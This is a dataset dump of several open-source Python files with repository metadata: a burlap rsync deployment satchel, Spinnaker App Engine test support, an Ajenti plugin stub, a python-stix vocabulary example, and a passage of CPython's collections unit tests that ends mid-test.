text
stringlengths 4
1.02M
| meta
dict |
|---|---|
from __future__ import print_function
from burlap import Satchel
from burlap.constants import *
from burlap.decorators import task
from burlap.common import only_hostname
RSYNC = 'rsync'  # Transfer-method identifier checked by TarballSatchel.configure().
# DEPRECATED: TODO: remove tarball functionality, and rename to CodeSatchel
class TarballSatchel(Satchel):
    """Deploys a local source tree to remote hosts.

    Despite the name, only the rsync transfer path is exercised by
    configure(); per the module-level TODO, the tarball functionality is
    deprecated and this satchel is slated to become CodeSatchel.
    """

    name = 'tarball'

    def set_defaults(self):
        """Populate the default env settings for this satchel."""
        self.env.clean = 1
        self.env.gzip = 1
        # Transfer method; RSYNC is the only value configure() acts on.
        self.env.method = RSYNC
        # Single local directory to push when rsync_source_dirs is empty.
        self.env.rsync_source_dir = 'src'
        self.env.rsync_source_dirs = [] # This overrides rsync_source_dir
        self.env.rsync_target_dir = None
        # Remote endpoint template; placeholders are expanded by the renderer.
        self.env.rsync_target_host = '{user}@{host_string}:'
        self.env.rsync_auth = '--rsh "ssh -t -o StrictHostKeyChecking=no -i {key_filename}"'
        self.env.rsync_command_template = (
            'rsync '
            '--recursive --verbose --perms --times --links '
            '--compress --copy-links {exclude_str} '
            '--delete --delete-before --force '
            '{rsync_auth} '
            '{rsync_source_dir} '
            '{rsync_target_host}{rsync_target_dir}'
        )
        # Patterns converted into rsync --exclude options by deploy_rsync().
        self.env.exclusions = [
            '*_local.py',
            '*.pyc',
            '*.svn',
            '*.tar.gz',
            '*.log',
            'twistd.pid',
            '*.sqlite',
        ]
        self.env.dir = '.burlap/tarball_cache'
        self.env.extra_dirs = []
        # Ownership/permissions applied remotely by set_permissions().
        # NOTE(review): env.set_permissions (a flag) shares its name with the
        # set_permissions() task method below.
        self.env.perm_user = 'www-data'
        self.env.perm_group = 'www-data'
        self.env.perm_chmod = None
        self.env.set_permissions = True

    @property
    def timestamp(self):
        """Return the last-modified timestamp of the local source tree.

        Exclusion patterns containing a '/' are dropped from the ignore
        list -- presumably because get_last_modified_timestamp matches
        bare names only; TODO confirm against burlap.common.
        """
        from burlap.common import get_last_modified_timestamp
        r = self.local_renderer
        fn = r.env.rsync_source_dir
        if self.verbose:
            print('tarball.fn:', fn)
        return get_last_modified_timestamp(fn, ignore=[_ for _ in r.env.exclusions if '/' not in _])

    @task
    def changed(self):
        """Print and return whether the source tree is unchanged.

        Note the inverted-sounding contract: returns True when the current
        timestamp EQUALS the last-deployed one (i.e. NO change).
        """
        lm = self.last_manifest
        last_timestamp = lm.timestamp
        current_timestamp = self.timestamp
        self.vprint('last_timestamp:', last_timestamp)
        self.vprint('current_timestamp:', current_timestamp)
        ret = last_timestamp == current_timestamp
        print('NO change' if ret else 'CHANGED!')
        return ret

    def record_manifest(self):
        """
        Called after a deployment to record any data necessary to detect changes
        for a future deployment.
        """
        manifest = super(TarballSatchel, self).record_manifest()
        manifest['timestamp'] = self.timestamp
        return manifest

    @task
    def set_permissions(self):
        """Apply ownership (and optional chmod) to the remote target dir."""
        r = self.local_renderer
        if r.env.rsync_target_dir:
            if r.env.perm_chmod:
                r.sudo('chmod -R {perm_chmod} {rsync_target_dir}')
            r.sudo('chown -R {perm_user}:{perm_group} {rsync_target_dir}')

    def _run_rsync(self, src, dst):
        """Rsync *src* to the remote target directory in two hops.

        Hop 1 rsyncs from the local machine into a /tmp staging directory
        on the remote host (where we have full permissions); hop 2 rsyncs
        from staging into the real target as sudo.

        NOTE(review): *dst* is only used in the log line -- the actual
        destination always comes from env.rsync_target_dir.  Also, the
        finally clause restores rsync_target_dir but NOT rsync_target_host
        or rsync_auth, which are blanked for hop 2; verify this cannot
        corrupt a subsequent _run_rsync call in the same session.
        """
        print('rsync %s -> %s' % (src, dst))
        r = self.local_renderer
        r.env.hostname = only_hostname(r.genv.host_string)
        real_rsync_target_dir = r.env.rsync_target_dir
        try:
            # Rsync to a temporary directory where we'll have full permissions.
            tmp_dir = '/tmp/tmp_%s_%s' % (self.env.rsync_target_dir.replace('/', '_'), src.replace('/', '_'))
            r.env.rsync_target_dir = tmp_dir
            r.env.rsync_source_dir = src
            r.local(self.env.rsync_command_template)
            # Then rsync from the temp directory as sudo to complete the operation.
            r.env.rsync_source_dir = tmp_dir+'/*'
            r.env.rsync_target_dir = real_rsync_target_dir
            r.env.rsync_target_host = ''
            r.env.rsync_auth = ''
            r.sudo(self.env.rsync_command_template)
        finally:
            r.env.rsync_target_dir = real_rsync_target_dir

    @task
    def deploy_rsync(self, *args, **kwargs):
        """Deploy every configured source directory to the target via rsync."""
        r = self.local_renderer
        # Confirm source directories.
        src_dirs = list(self.env.rsync_source_dirs)
        if not src_dirs:
            src_dirs.append(self.env.rsync_source_dir)
        # Confirm target directories.
        assert self.env.rsync_target_dir
        r.env.exclude_str = ' '.join('--exclude=%s' % _ for _ in self.env.exclusions)
        for src_dir in src_dirs:
            self._run_rsync(src=src_dir, dst=self.env.rsync_target_dir)
        if self.env.set_permissions:
            self.set_permissions()

    @task(precursors=['gitchecker', 'packager', 'apache2', 'pip', 'user'])
    def configure(self, *args, **kwargs):
        """Deployment entry point: dispatch to the configured method."""
        if self.env.method == RSYNC:
            self.deploy_rsync(*args, **kwargs)
# Module-level singleton; instantiation registers the satchel with burlap.
tarball_satchel = TarballSatchel()
# Conventional module-level alias for the deploy entry point.
deploy = tarball_satchel.configure
|
{
"content_hash": "dd9764de1572401517affbd4a8efd53f",
"timestamp": "",
"source": "github",
"line_count": 150,
"max_line_length": 109,
"avg_line_length": 31.346666666666668,
"alnum_prop": 0.5767758400680562,
"repo_name": "chrisspen/burlap",
"id": "cc3c0143b11ceebd895aae70fcb0da13f716a344",
"size": "4702",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "burlap/tarball.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "722479"
},
{
"name": "Shell",
"bytes": "11659"
}
],
"symlink_target": ""
}
|
"""Google App Engine platform and testing support for SpinnakerTestScenario."""
import citest.gcp_testing as gcp
from spinnaker_testing.base_scenario_support import BaseScenarioPlatformSupport
class AppEngineScenarioSupport(BaseScenarioPlatformSupport):
  """Provides SpinnakerScenarioSupport for Google App Engine."""

  @classmethod
  def add_commandline_parameters(cls, scenario_class, builder, defaults):
    """Implements BaseScenarioPlatformSupport interface.

    Args:
      scenario_class: [class spinnaker_testing.SpinnakerTestScenario]
      builder: [citest.base.ConfigBindingsBuilder]
      defaults: [dict] Default binding value overrides.
         This is used to initialize the default commandline parameters.
    """
    #
    # Operation Parameters
    #
    builder.add_argument(
        '--spinnaker_appengine_account',
        default=defaults.get('SPINNAKER_APPENGINE_ACCOUNT', None),
        # BUGFIX: adjacent string literals concatenated without a space,
        # rendering as "...againstApp Engine" in --help output.
        help='Spinnaker account name to use for test operations against'
             ' App Engine. Only used when managing resources on App Engine.')

    #
    # Observer parameters
    #
    builder.add_argument(
        '--appengine_credentials_path',
        default=defaults.get('APPENGINE_CREDENTIALS_PATH', None),
        # BUGFIX: missing space before "--gce_credentials_path" in the
        # concatenated help text.
        help='A path to the JSON file with credentials to use for observing'
             ' tests against Google App Engine. Defaults to the value set for'
             ' --gce_credentials_path, which defaults to application default'
             ' credentials.')

  def __init__(self, scenario):
    """Constructor.

    Args:
      scenario: [SpinnakerTestScenario] The scenario being supported.
    """
    super(AppEngineScenarioSupport, self).__init__("appengine", scenario)

    bindings = scenario.bindings
    if not bindings.get('APPENGINE_PRIMARY_MANAGED_PROJECT_ID'):
      # Prefer the project configured for the deployed appengine provider.
      bindings['APPENGINE_PRIMARY_MANAGED_PROJECT_ID'] = (
          scenario.agent.deployed_config.get(
              'providers.appengine.primaryCredentials.project', None))

      # Fall back on Google project and credentials.
      if not bindings['APPENGINE_PRIMARY_MANAGED_PROJECT_ID']:
        bindings['APPENGINE_PRIMARY_MANAGED_PROJECT_ID'] = (
            bindings['GOOGLE_PRIMARY_MANAGED_PROJECT_ID'])
        bindings['APPENGINE_CREDENTIALS_PATH'] = (
            bindings['GCE_CREDENTIALS_PATH'])

  def _make_observer(self):
    """Implements BaseScenarioPlatformSupport interface.

    Returns:
      A gcp.GcpAppengineAgent bound to the managed App Engine project.

    Raises:
      ValueError: If no appengine project id binding was resolved.
    """
    bindings = self.scenario.bindings
    if not bindings.get('APPENGINE_PRIMARY_MANAGED_PROJECT_ID'):
      raise ValueError('There is no "appengine_primary_managed_project_id"')

    return gcp.GcpAppengineAgent.make_agent(
        scopes=gcp.APPENGINE_FULL_SCOPE,
        credentials_path=bindings['APPENGINE_CREDENTIALS_PATH'],
        default_variables={
            'project': bindings['APPENGINE_PRIMARY_MANAGED_PROJECT_ID']})
|
{
"content_hash": "728cc2fc25ecf252f9b1a3960ad9a29f",
"timestamp": "",
"source": "github",
"line_count": 71,
"max_line_length": 79,
"avg_line_length": 40.028169014084504,
"alnum_prop": 0.6949331456720619,
"repo_name": "duftler/spinnaker",
"id": "5ecf767a9300ae5bfba873ed9d17d184d74c2e97",
"size": "3439",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "testing/citest/spinnaker_testing/appengine_scenario_support.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "1832"
},
{
"name": "Go",
"bytes": "8690"
},
{
"name": "HTML",
"bytes": "614"
},
{
"name": "Jsonnet",
"bytes": "44273"
},
{
"name": "Makefile",
"bytes": "363"
},
{
"name": "Python",
"bytes": "1279646"
},
{
"name": "Shell",
"bytes": "185455"
},
{
"name": "Smarty",
"bytes": "2087"
}
],
"symlink_target": ""
}
|
from ajenti.api import *
from ajenti.plugins import *
# Plugin manifest consumed by the Ajenti plugin loader.
info = PluginInfo(
    title='Teamspeak',
    icon='leaf',
    dependencies=[
        PluginDependency('main'),
        PluginDependency('dashboard'),
    ],
)
def init():
    """Plugin activation hook: load the plugin's main module on demand."""
    # NOTE(review): implicit relative import (Python 2 style) -- confirm
    # this plugin targets a Python 2 Ajenti runtime.
    import main
|
{
"content_hash": "91ef3aa7ef3890547527826e7f4a992d",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 38,
"avg_line_length": 15.375,
"alnum_prop": 0.6178861788617886,
"repo_name": "emcx/ajenti-ts",
"id": "dca968c0b9e386c3e8689177380c331d4fd04f1d",
"size": "246",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "1811"
},
{
"name": "Shell",
"bytes": "558"
}
],
"symlink_target": ""
}
|
"""
File: vocabstrings.py
Demonstrates uses of VocabString for STIX Controlled Vocabularies.
"""
from __future__ import print_function

from stix.core import STIXHeader
from stix.common.vocabs import VocabString, PackageIntent
def main():
    """Build a STIXHeader demonstrating custom VocabString package intents.

    BUGFIX: the original mixed Python-2 print statements with print()
    calls, which is a SyntaxError on Python 3; all output now uses the
    print() function (backed by the __future__ import at file top).
    """
    # Create STIXHeader instance
    header = STIXHeader()
    header.package_intents.append(PackageIntent.TERM_INDICATORS)

    # To add a Package_Intent value that exists outside of the
    # PackageIntentVocab controlled vocabulary, we pass in an
    # instance of VocabString.
    #
    # This will create a new Package_Intent field without an
    # xsi:type and will not perform any validation of input terms.
    #
    # Passing in an instance of VocabString works for every
    # ControlledVocabularyStringType field (or in python-stix,
    # every VocabString field).
    non_default_value = VocabString("NON STANDARD PACKAGE INTENT")
    header.package_intents.append(non_default_value)

    # Print XML!
    print(header.to_xml())

    # NOTE: Passing in a str value that is not included in the list
    # of default CV terms will raise a ValueError. This is why we pass
    # in a VocabString instance.
    #
    # Example:
    try:
        msg = (
            "[-] Attempting to add an str instance that does not exist "
            "in the PackageIntent ALLOWED_VALUES list"
        )
        print(msg)
        header.package_intents.append("THIS WILL THROW A VALUEERROR")
    except Exception as ex:
        print("[!] As expected, that failed. Here's the Exception message:")
        print("[!]", str(ex))
# Run the demo only when executed as a script.
if __name__ == '__main__':
    main()
|
{
"content_hash": "4607cec8469ffa7ed7cc5c776d46eace",
"timestamp": "",
"source": "github",
"line_count": 51,
"max_line_length": 75,
"avg_line_length": 30.666666666666668,
"alnum_prop": 0.6751918158567775,
"repo_name": "STIXProject/python-stix",
"id": "6fd5f7f67955d3fbf9e13a33d25a876d8eb16167",
"size": "1691",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "examples/vocabstrings.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "1422974"
}
],
"symlink_target": ""
}
|
"""Unit tests for collections.py."""
import collections
import copy
import doctest
import inspect
import operator
import pickle
from random import choice, randrange
from itertools import product, chain, combinations
import string
import sys
from test import support
import types
import unittest
from collections import namedtuple, Counter, OrderedDict, _count_elements
from collections import UserDict, UserString, UserList
from collections import ChainMap
from collections import deque
from collections.abc import Awaitable, Coroutine
from collections.abc import AsyncIterator, AsyncIterable, AsyncGenerator
from collections.abc import Hashable, Iterable, Iterator, Generator, Reversible
from collections.abc import Sized, Container, Callable, Collection
from collections.abc import Set, MutableSet
from collections.abc import Mapping, MutableMapping, KeysView, ItemsView, ValuesView
from collections.abc import Sequence, MutableSequence
from collections.abc import ByteString
class TestUserObjects(unittest.TestCase):
    """Sanity checks for the UserDict/UserList/UserString wrappers."""

    def _superset_test(self, a, b):
        # Every public attribute of the builtin must also exist on the wrapper.
        message = '{a} should have all the methods of {b}'.format(
            a=a.__name__,
            b=b.__name__,
        )
        self.assertGreaterEqual(set(dir(a)), set(dir(b)), message)

    def _copy_test(self, obj):
        # The wrapper's own copy() must duplicate the underlying data...
        duplicate = obj.copy()
        self.assertIsNot(obj.data, duplicate.data)
        self.assertEqual(obj.data, duplicate.data)
        # ...and copy.copy() must additionally share instance attributes.
        obj.test = [1234]  # Make sure instance vars are also copied.
        duplicate = copy.copy(obj)
        self.assertIsNot(obj.data, duplicate.data)
        self.assertEqual(obj.data, duplicate.data)
        self.assertIs(obj.test, duplicate.test)

    def test_str_protocol(self):
        self._superset_test(UserString, str)

    def test_list_protocol(self):
        self._superset_test(UserList, list)

    def test_dict_protocol(self):
        self._superset_test(UserDict, dict)

    def test_list_copy(self):
        wrapper = UserList()
        wrapper.append(123)
        self._copy_test(wrapper)

    def test_dict_copy(self):
        wrapper = UserDict()
        wrapper[123] = "abc"
        self._copy_test(wrapper)
################################################################################
### ChainMap (helper class for configparser and the string module)
################################################################################
class TestChainMap(unittest.TestCase):
    """Behavioral tests for collections.ChainMap: lookup chaining,
    mutation of the first map, copies/pickling, ordering, __missing__,
    and the PEP 584 union operators."""

    def test_basics(self):
        c = ChainMap()
        c['a'] = 1
        c['b'] = 2
        d = c.new_child()
        d['b'] = 20
        d['c'] = 30
        self.assertEqual(d.maps, [{'b':20, 'c':30}, {'a':1, 'b':2}]) # check internal state
        self.assertEqual(d.items(), dict(a=1, b=20, c=30).items()) # check items/iter/getitem
        self.assertEqual(len(d), 3) # check len
        for key in 'abc': # check contains
            self.assertIn(key, d)
        for k, v in dict(a=1, b=20, c=30, z=100).items(): # check get
            self.assertEqual(d.get(k, 100), v)
        del d['b'] # unmask a value
        self.assertEqual(d.maps, [{'c':30}, {'a':1, 'b':2}]) # check internal state
        self.assertEqual(d.items(), dict(a=1, b=2, c=30).items()) # check items/iter/getitem
        self.assertEqual(len(d), 3) # check len
        for key in 'abc': # check contains
            self.assertIn(key, d)
        for k, v in dict(a=1, b=2, c=30, z=100).items(): # check get
            self.assertEqual(d.get(k, 100), v)
        self.assertIn(repr(d), [ # check repr
            type(d).__name__ + "({'c': 30}, {'a': 1, 'b': 2})",
            type(d).__name__ + "({'c': 30}, {'b': 2, 'a': 1})"
        ])
        for e in d.copy(), copy.copy(d): # check shallow copies
            self.assertEqual(d, e)
            self.assertEqual(d.maps, e.maps)
            self.assertIsNot(d, e)
            # Shallow copy replaces only maps[0]; the rest are shared.
            self.assertIsNot(d.maps[0], e.maps[0])
            for m1, m2 in zip(d.maps[1:], e.maps[1:]):
                self.assertIs(m1, m2)
        # check deep copies
        for proto in range(pickle.HIGHEST_PROTOCOL + 1):
            e = pickle.loads(pickle.dumps(d, proto))
            self.assertEqual(d, e)
            self.assertEqual(d.maps, e.maps)
            self.assertIsNot(d, e)
            for m1, m2 in zip(d.maps, e.maps):
                self.assertIsNot(m1, m2, e)
        for e in [copy.deepcopy(d),
                  eval(repr(d))
                 ]:
            self.assertEqual(d, e)
            self.assertEqual(d.maps, e.maps)
            self.assertIsNot(d, e)
            for m1, m2 in zip(d.maps, e.maps):
                self.assertIsNot(m1, m2, e)
        f = d.new_child()
        f['b'] = 5
        self.assertEqual(f.maps, [{'b': 5}, {'c':30}, {'a':1, 'b':2}])
        self.assertEqual(f.parents.maps, [{'c':30}, {'a':1, 'b':2}]) # check parents
        self.assertEqual(f['b'], 5) # find first in chain
        self.assertEqual(f.parents['b'], 2) # look beyond maps[0]

    def test_ordering(self):
        # Combined order matches a series of dict updates from last to first.
        # This test relies on the ordering of the underlying dicts.
        baseline = {'music': 'bach', 'art': 'rembrandt'}
        adjustments = {'art': 'van gogh', 'opera': 'carmen'}
        cm = ChainMap(adjustments, baseline)
        combined = baseline.copy()
        combined.update(adjustments)
        self.assertEqual(list(combined.items()), list(cm.items()))

    def test_constructor(self):
        self.assertEqual(ChainMap().maps, [{}]) # no-args --> one new dict
        self.assertEqual(ChainMap({1:2}).maps, [{1:2}]) # 1 arg --> list

    def test_bool(self):
        # Truthiness reflects whether ANY chained map has entries.
        self.assertFalse(ChainMap())
        self.assertFalse(ChainMap({}, {}))
        self.assertTrue(ChainMap({1:2}, {}))
        self.assertTrue(ChainMap({}, {1:2}))

    def test_missing(self):
        class DefaultChainMap(ChainMap):
            def __missing__(self, key):
                return 999
        d = DefaultChainMap(dict(a=1, b=2), dict(b=20, c=30))
        for k, v in dict(a=1, b=2, c=30, d=999).items():
            self.assertEqual(d[k], v) # check __getitem__ w/missing
        for k, v in dict(a=1, b=2, c=30, d=77).items():
            self.assertEqual(d.get(k, 77), v) # check get() w/ missing
        for k, v in dict(a=True, b=True, c=True, d=False).items():
            self.assertEqual(k in d, v) # check __contains__ w/missing
        self.assertEqual(d.pop('a', 1001), 1, d)
        self.assertEqual(d.pop('a', 1002), 1002) # check pop() w/missing
        self.assertEqual(d.popitem(), ('b', 2)) # check popitem() w/missing
        with self.assertRaises(KeyError):
            d.popitem()

    def test_order_preservation(self):
        # Iteration order: later (deeper) maps first, preserving each
        # map's insertion order, with earlier maps overriding values.
        d = ChainMap(
            OrderedDict(j=0, h=88888),
            OrderedDict(),
            OrderedDict(i=9999, d=4444, c=3333),
            OrderedDict(f=666, b=222, g=777, c=333, h=888),
            OrderedDict(),
            OrderedDict(e=55, b=22),
            OrderedDict(a=1, b=2, c=3, d=4, e=5),
            OrderedDict(),
        )
        self.assertEqual(''.join(d), 'abcdefghij')
        self.assertEqual(list(d.items()),
            [('a', 1), ('b', 222), ('c', 3333), ('d', 4444),
             ('e', 55), ('f', 666), ('g', 777), ('h', 88888),
             ('i', 9999), ('j', 0)])

    def test_iter_not_calling_getitem_on_maps(self):
        class DictWithGetItem(UserDict):
            def __init__(self, *args, **kwds):
                self.called = False
                UserDict.__init__(self, *args, **kwds)
            def __getitem__(self, item):
                self.called = True
                UserDict.__getitem__(self, item)
        d = DictWithGetItem(a=1)
        c = ChainMap(d)
        d.called = False
        set(c) # iterate over chain map
        self.assertFalse(d.called, '__getitem__ was called')

    def test_dict_coercion(self):
        d = ChainMap(dict(a=1, b=2), dict(b=20, c=30))
        self.assertEqual(dict(d), dict(a=1, b=2, c=30))
        self.assertEqual(dict(d.items()), dict(a=1, b=2, c=30))

    def test_new_child(self):
        'Tests for changes for issue #16613.'
        c = ChainMap()
        c['a'] = 1
        c['b'] = 2
        m = {'b':20, 'c': 30}
        d = c.new_child(m)
        self.assertEqual(d.maps, [{'b':20, 'c':30}, {'a':1, 'b':2}]) # check internal state
        self.assertIs(m, d.maps[0])

        # Use a different map than a dict
        class lowerdict(dict):
            def __getitem__(self, key):
                if isinstance(key, str):
                    key = key.lower()
                return dict.__getitem__(self, key)
            def __contains__(self, key):
                if isinstance(key, str):
                    key = key.lower()
                return dict.__contains__(self, key)

        c = ChainMap()
        c['a'] = 1
        c['b'] = 2
        m = lowerdict(b=20, c=30)
        d = c.new_child(m)
        self.assertIs(m, d.maps[0])
        for key in 'abc': # check contains
            self.assertIn(key, d)
        for k, v in dict(a=1, B=20, C=30, z=100).items(): # check get
            self.assertEqual(d.get(k, 100), v)

        # new_child() also accepts keyword arguments (3.10+).
        c = ChainMap({'a': 1, 'b': 2})
        d = c.new_child(b=20, c=30)
        self.assertEqual(d.maps, [{'b': 20, 'c': 30}, {'a': 1, 'b': 2}])

    def test_union_operators(self):
        cm1 = ChainMap(dict(a=1, b=2), dict(c=3, d=4))
        cm2 = ChainMap(dict(a=10, e=5), dict(b=20, d=4))
        cm3 = cm1.copy()
        d = dict(a=10, c=30)
        pairs = [('c', 3), ('p',0)]

        tmp = cm1 | cm2 # testing between chainmaps
        self.assertEqual(tmp.maps, [cm1.maps[0] | dict(cm2), *cm1.maps[1:]])
        cm1 |= cm2
        self.assertEqual(tmp, cm1)

        tmp = cm2 | d # testing between chainmap and mapping
        self.assertEqual(tmp.maps, [cm2.maps[0] | d, *cm2.maps[1:]])
        self.assertEqual((d | cm2).maps, [d | dict(cm2)])
        cm2 |= d
        self.assertEqual(tmp, cm2)

        # testing behavior between chainmap and iterable key-value pairs
        with self.assertRaises(TypeError):
            cm3 | pairs
        tmp = cm3.copy()
        cm3 |= pairs
        self.assertEqual(cm3.maps, [tmp.maps[0] | dict(pairs), *tmp.maps[1:]])

        # testing proper return types for ChainMap and it's subclasses
        class Subclass(ChainMap):
            pass
        class SubclassRor(ChainMap):
            def __ror__(self, other):
                return super().__ror__(other)

        tmp = ChainMap() | ChainMap()
        self.assertIs(type(tmp), ChainMap)
        self.assertIs(type(tmp.maps[0]), dict)
        tmp = ChainMap() | Subclass()
        self.assertIs(type(tmp), ChainMap)
        self.assertIs(type(tmp.maps[0]), dict)
        tmp = Subclass() | ChainMap()
        self.assertIs(type(tmp), Subclass)
        self.assertIs(type(tmp.maps[0]), dict)
        tmp = ChainMap() | SubclassRor()
        self.assertIs(type(tmp), SubclassRor)
        self.assertIs(type(tmp.maps[0]), dict)
################################################################################
### Named Tuples
################################################################################
# Module level so pickle can resolve the class by its qualified name.
TestNT = namedtuple('TestNT', 'x y z') # type used for pickle tests
class TestNamedTuple(unittest.TestCase):
def test_factory(self):
Point = namedtuple('Point', 'x y')
self.assertEqual(Point.__name__, 'Point')
self.assertEqual(Point.__slots__, ())
self.assertEqual(Point.__module__, __name__)
self.assertEqual(Point.__getitem__, tuple.__getitem__)
self.assertEqual(Point._fields, ('x', 'y'))
self.assertRaises(ValueError, namedtuple, 'abc%', 'efg ghi') # type has non-alpha char
self.assertRaises(ValueError, namedtuple, 'class', 'efg ghi') # type has keyword
self.assertRaises(ValueError, namedtuple, '9abc', 'efg ghi') # type starts with digit
self.assertRaises(ValueError, namedtuple, 'abc', 'efg g%hi') # field with non-alpha char
self.assertRaises(ValueError, namedtuple, 'abc', 'abc class') # field has keyword
self.assertRaises(ValueError, namedtuple, 'abc', '8efg 9ghi') # field starts with digit
self.assertRaises(ValueError, namedtuple, 'abc', '_efg ghi') # field with leading underscore
self.assertRaises(ValueError, namedtuple, 'abc', 'efg efg ghi') # duplicate field
namedtuple('Point0', 'x1 y2') # Verify that numbers are allowed in names
namedtuple('_', 'a b c') # Test leading underscores in a typename
nt = namedtuple('nt', 'the quick brown fox') # check unicode input
self.assertNotIn("u'", repr(nt._fields))
nt = namedtuple('nt', ('the', 'quick')) # check unicode input
self.assertNotIn("u'", repr(nt._fields))
self.assertRaises(TypeError, Point._make, [11]) # catch too few args
self.assertRaises(TypeError, Point._make, [11, 22, 33]) # catch too many args
def test_defaults(self):
Point = namedtuple('Point', 'x y', defaults=(10, 20)) # 2 defaults
self.assertEqual(Point._field_defaults, {'x': 10, 'y': 20})
self.assertEqual(Point(1, 2), (1, 2))
self.assertEqual(Point(1), (1, 20))
self.assertEqual(Point(), (10, 20))
Point = namedtuple('Point', 'x y', defaults=(20,)) # 1 default
self.assertEqual(Point._field_defaults, {'y': 20})
self.assertEqual(Point(1, 2), (1, 2))
self.assertEqual(Point(1), (1, 20))
Point = namedtuple('Point', 'x y', defaults=()) # 0 defaults
self.assertEqual(Point._field_defaults, {})
self.assertEqual(Point(1, 2), (1, 2))
with self.assertRaises(TypeError):
Point(1)
with self.assertRaises(TypeError): # catch too few args
Point()
with self.assertRaises(TypeError): # catch too many args
Point(1, 2, 3)
with self.assertRaises(TypeError): # too many defaults
Point = namedtuple('Point', 'x y', defaults=(10, 20, 30))
with self.assertRaises(TypeError): # non-iterable defaults
Point = namedtuple('Point', 'x y', defaults=10)
with self.assertRaises(TypeError): # another non-iterable default
Point = namedtuple('Point', 'x y', defaults=False)
Point = namedtuple('Point', 'x y', defaults=None) # default is None
self.assertEqual(Point._field_defaults, {})
self.assertIsNone(Point.__new__.__defaults__, None)
self.assertEqual(Point(10, 20), (10, 20))
with self.assertRaises(TypeError): # catch too few args
Point(10)
Point = namedtuple('Point', 'x y', defaults=[10, 20]) # allow non-tuple iterable
self.assertEqual(Point._field_defaults, {'x': 10, 'y': 20})
self.assertEqual(Point.__new__.__defaults__, (10, 20))
self.assertEqual(Point(1, 2), (1, 2))
self.assertEqual(Point(1), (1, 20))
self.assertEqual(Point(), (10, 20))
Point = namedtuple('Point', 'x y', defaults=iter([10, 20])) # allow plain iterator
self.assertEqual(Point._field_defaults, {'x': 10, 'y': 20})
self.assertEqual(Point.__new__.__defaults__, (10, 20))
self.assertEqual(Point(1, 2), (1, 2))
self.assertEqual(Point(1), (1, 20))
self.assertEqual(Point(), (10, 20))
def test_readonly(self):
Point = namedtuple('Point', 'x y')
p = Point(11, 22)
with self.assertRaises(AttributeError):
p.x = 33
with self.assertRaises(AttributeError):
del p.x
with self.assertRaises(TypeError):
p[0] = 33
with self.assertRaises(TypeError):
del p[0]
self.assertEqual(p.x, 11)
self.assertEqual(p[0], 11)
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_factory_doc_attr(self):
Point = namedtuple('Point', 'x y')
self.assertEqual(Point.__doc__, 'Point(x, y)')
Point.__doc__ = '2D point'
self.assertEqual(Point.__doc__, '2D point')
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_field_doc(self):
Point = namedtuple('Point', 'x y')
self.assertEqual(Point.x.__doc__, 'Alias for field number 0')
self.assertEqual(Point.y.__doc__, 'Alias for field number 1')
Point.x.__doc__ = 'docstring for Point.x'
self.assertEqual(Point.x.__doc__, 'docstring for Point.x')
# namedtuple can mutate doc of descriptors independently
Vector = namedtuple('Vector', 'x y')
self.assertEqual(Vector.x.__doc__, 'Alias for field number 0')
Vector.x.__doc__ = 'docstring for Vector.x'
self.assertEqual(Vector.x.__doc__, 'docstring for Vector.x')
@support.cpython_only
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_field_doc_reuse(self):
P = namedtuple('P', ['m', 'n'])
Q = namedtuple('Q', ['o', 'p'])
self.assertIs(P.m.__doc__, Q.o.__doc__)
self.assertIs(P.n.__doc__, Q.p.__doc__)
@support.cpython_only
def test_field_repr(self):
Point = namedtuple('Point', 'x y')
self.assertEqual(repr(Point.x), "_tuplegetter(0, 'Alias for field number 0')")
self.assertEqual(repr(Point.y), "_tuplegetter(1, 'Alias for field number 1')")
Point.x.__doc__ = 'The x-coordinate'
Point.y.__doc__ = 'The y-coordinate'
self.assertEqual(repr(Point.x), "_tuplegetter(0, 'The x-coordinate')")
self.assertEqual(repr(Point.y), "_tuplegetter(1, 'The y-coordinate')")
def test_name_fixer(self):
for spec, renamed in [
[('efg', 'g%hi'), ('efg', '_1')], # field with non-alpha char
[('abc', 'class'), ('abc', '_1')], # field has keyword
[('8efg', '9ghi'), ('_0', '_1')], # field starts with digit
[('abc', '_efg'), ('abc', '_1')], # field with leading underscore
[('abc', 'efg', 'efg', 'ghi'), ('abc', 'efg', '_2', 'ghi')], # duplicate field
[('abc', '', 'x'), ('abc', '_1', 'x')], # fieldname is a space
]:
self.assertEqual(namedtuple('NT', spec, rename=True)._fields, renamed)
def test_module_parameter(self):
NT = namedtuple('NT', ['x', 'y'], module=collections)
self.assertEqual(NT.__module__, collections)
def test_instance(self):
Point = namedtuple('Point', 'x y')
p = Point(11, 22)
self.assertEqual(p, Point(x=11, y=22))
self.assertEqual(p, Point(11, y=22))
self.assertEqual(p, Point(y=22, x=11))
self.assertEqual(p, Point(*(11, 22)))
self.assertEqual(p, Point(**dict(x=11, y=22)))
self.assertRaises(TypeError, Point, 1) # too few args
self.assertRaises(TypeError, Point, 1, 2, 3) # too many args
with self.assertRaises(TypeError): # wrong keyword argument
Point(XXX=1, y=2)
with self.assertRaises(TypeError): # missing keyword argument
Point(x=1)
self.assertEqual(repr(p), 'Point(x=11, y=22)')
self.assertNotIn('__weakref__', dir(p))
self.assertEqual(p, Point._make([11, 22])) # test _make classmethod
self.assertEqual(p._fields, ('x', 'y')) # test _fields attribute
self.assertEqual(p._replace(x=1), (1, 22)) # test _replace method
self.assertEqual(p._asdict(), dict(x=11, y=22)) # test _asdict method
try:
p._replace(x=1, error=2)
except ValueError:
pass
else:
self._fail('Did not detect an incorrect fieldname')
# verify that field string can have commas
Point = namedtuple('Point', 'x, y')
p = Point(x=11, y=22)
self.assertEqual(repr(p), 'Point(x=11, y=22)')
# verify that fieldspec can be a non-string sequence
Point = namedtuple('Point', ('x', 'y'))
